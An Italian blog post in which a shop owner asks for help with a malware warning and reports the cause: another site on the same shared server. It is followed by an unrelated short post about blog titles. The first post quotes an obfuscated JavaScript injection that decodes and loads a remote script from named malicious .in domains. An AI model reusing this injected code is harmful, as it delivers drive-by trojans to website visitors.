[RISOLTO] Sito Infetto Da Malware: Dove?

In questi giorni mi sono arrivate un paio di notifiche da parte di utenti che aprendo due miei siti (negozi online per la precisione) l’antivirus scatta sull’attenti segnalando codice malevolo. Pensando che fosse qualcos’altro non ho dato molto peso, oggi però l’ho potuto vedere grazie ad uno screenshot.

C’è qualcosa che non va.. guardando sui webmaster tools di Google vedo che su un sito mi segnala una pagina contenente questo codice:

Purtroppo Google ha trovato codice dannoso sul tuo sito.

< img src=”about:blank” onError=’astro=unescape(“%27”);astru=
unescape(“%22”);sksa=eval(“document.getElementById(“+astro+”
seaid”+astro+”).src=unescape(“+astro+”%68%74%74%70%3A%2F%2F”
+astro+”)+document.getElementById(“+astro+”5550″+astro+”).id
+unescape(“+astro+”%2E%69%6E%2F”+astro+”)+”+astro+”129091371
2″+astro+”+unescape(“+astro+”%2E%70%68%70″+astro+”)”);docume
nt.getElementById(“seaid”).src=sksa’ style=”width:300;height
:300;border:0px;” >

mentre sul secondo sito mi dice che è tutto ok.

Facendo qualche ricerca trovo che questo codice è proprio la codifica di un url solitamente composto cosi xxxxx.in/xxxx.php che contiene codice malevolo e fa aprire 2 pdf infetti. Leggo inoltre che ha colpito molti blog su base wordpress.

Per caso ne hai sentito parlare?

Io nei miei due negozi online, creati con cms diversi (zen-cart e virtuemart) non riesco a trovare questo codice, inoltre ho guardato le date di ultima modifica dei file per capire se qualcuno avesse iniettato codice malevolo e non c’è niente di recente. Ho cercato veramente a fondo leggendo tutti i casi e cercando file dopo file eventuali stringhe nascoste, iframe o script, htaccess e file config,  ma niente! E’ tutto in ordine e pulito..

A me personalmente non è mai apparso niente navigandoci e comunque Google non da l’avviso di “sito che può danneggiare il tuo computer”; non so più dove guardare o cosa fare. Credo ci sia qualcosa, perchè avendo ricevuto segnalazioni diverse ho scartato l’idea di un falso positivo o di un problema sul pc con cui si naviga.

Hai qualche consiglio da darmi? esperienze simili? aiuti su dove potrebbe esserci un buco?

I due negozi hanno una versione dei cms è piuttosto datata lo so, però sono le versioni stabili con relative patch; non le ho ancora aggiornate in quanto sono gli ultimi mesi di vita, presto lasceranno il posto ad un negozio tutto nuovo.

Per il momento non mi resta che aspettare l’aggiornamento dei dati in strumenti per webmaster di Google per vedere se lo ritrova.

Ogni consiglio sarà veramente di aiuto, grazie!

P.S.: Ho un buono adwords da 75 euro in più 😀 Potrebbe essere un regalo per chi risolve il caso 😉

P.P.S.: Visitando i siti ricevete un allarme dal vostro antivirus? (se lo avete ovviamente)

UPDATE: Ancora oggi sono in alto mare.. ho potuto testarlo di persona; dopo il tad di chiusura </html> appare il codice postato sopra, richiama un file php che carica delle classi java, fa scaricare dei file pdf e fa partire il media player di windows. Un disastro insomma.

Vedo che il sito dannoso è 3737373.in o in-in.in, trattasi di Un Trojan-Downlaoder.java.openconnection.bu e un trojan Packed.Win32.Krap.ao

UPDATE RISOLUTIVO: Bene, trovata la soluzione. Il codice maligno non riuscivo a scovarlo semplicemente perchè non c’era. -.- Mi ha risposto il provider dicendo che han risolto; un sito ospitato sul mio stesso server stava infettando tutti gli altri.

Bene, anno nuovo server nuovo, passo ad un dedicato 😉

Come Arrivare a 100 Utenti On-line

Come Arrivare a 100 Utenti Online

Come si fa ad attirare utenti attraverso un articolo sul proprio blog?

Ci sono tante risposte e idee, come il pubblicizzarlo nel posto giusto, avere forza nei social network in modo che amici e seguaci facciano girare la notizia, mettere foto provocanti, osè e così via.

Secondo la mia esperienza, invece, posso dire che un buon 90% di probabilità di successo sia da assegnare al titolo dell’articolo.

Questo post è una prova che voglio fare, ovvero un articolo dal contenuto povero, ma con un titolo diciamo interessante; non dico buono perchè non posso saperlo al momento, però credo attiri un pò l’attenzione.

Arriverà quindi la punta di utenti on-line a quota 100?

E tu che stai leggendo, sei stato attirato dal titolo? Che importanza dai al titolo da 1 a 10?